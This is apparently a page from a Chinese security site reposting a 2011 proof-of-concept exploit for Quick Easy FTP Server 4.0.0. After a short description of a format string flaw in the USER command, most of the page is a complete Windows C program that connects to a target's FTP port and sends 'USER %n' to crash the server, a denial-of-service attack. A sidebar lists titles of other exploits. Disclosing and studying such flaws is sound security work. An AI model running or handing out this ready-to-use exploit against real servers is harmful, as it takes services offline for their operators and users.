Quick easy ftp server 4.0.0 USER命令格式化串漏洞(D.O.S) POC

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Quick easy ftp server 4.0.0 USER命令格式化串漏洞(D.O.S) POC

来源：ylbhz@hotmail.com 作者：ylbhz 发布时间：2011-10-08

# Exploit Title: Quick easy ftp server 4.0.0 USER command format string Vulnerability
# Date: [date]
# Vendor or Software Link:google can help you.^_^
# Version: 4.0 other mybe effected also
# Category:: [remote]
# Tested on: win2k sp4 (cn)
 
Description:
Quick easy ftp server din't check the format string used in wsprintfA，But I the buffer is too small so I think exploit it is difficult。I use the format string "%n" to crash the program，make a dos attack。
 
#include <stdio.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")
int SendPayload(char* lpHost, int intPort, char* lpPayload, int intSize);
int main(int argc, char* argv[])
{
 if(argc != 2)
 {
  printf("Quick easy ftp server 4.0.0 USER命令格式化串漏洞(D.O.S) POC\r\n");
  printf("contact: ylbhz@hotmail.com\r\n");
  printf("C:\\>exp [ip address]\r\n");
  return 0;
 }
 char strHost[20] = {0};
 strcpy(strHost, argv[1]);
 char lpBuf[] = "USER %n\r\n\r\n";
 SendPayload(strHost, 21, lpBuf, lstrlenA(lpBuf));
 
 return 0;
}
int SendPayload(char* lpHost, int intPort, char* lpPayload, int intSize)
{
 SOCKET sock;
 struct sockaddr_in client;
 WSADATA wsa;
 printf("[*]Init socket...\r\n");
 if(WSAStartup(MAKEWORD(2,2),&wsa) != 0)
 {
  printf("[-]WSAStartup Error!\r\n");
  return -1;
 }
 try
 {
  client.sin_addr.S_un.S_addr = inet_addr(lpHost);
  client.sin_family = AF_INET;
  client.sin_port = htons(intPort);
 }catch(...)
 {
  printf("[-]socket_inaddr init error!\r\n");
  return -1;
 }
 sock = socket(AF_INET,SOCK_STREAM,0);
 if(sock == SOCKET_ERROR)
 {
  printf("[-]socket create error!\r\n");
  WSACleanup();
  return -1;
 }
 printf("[+]Socket Init success!\r\n");
 printf("[*]Connect the Server...\r\n");
 if(connect(sock,(struct sockaddr *)&client,sizeof(client)) == SOCKET_ERROR)
 {
  printf("[-]Connect Error!\r\n");
  closesocket(sock);
  WSACleanup();
  return -1;
 }
 printf("[+]Connect successfull!\r\n");
 printf("[*]Send Payload!\r\n");
 int intLen = send(sock, lpPayload, intSize, 0);
 if(intLen <= 0) printf("[-]Send Payload Error!\r\n");
  else printf("Send %d bytes\r\n", intLen);
 char strBuf[1024] = {0};
 intLen = recv(sock, strBuf, 1024, 0);
 printf("[*]Close Socket!\r\n");
 closesocket(sock);
 return 0;
}

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告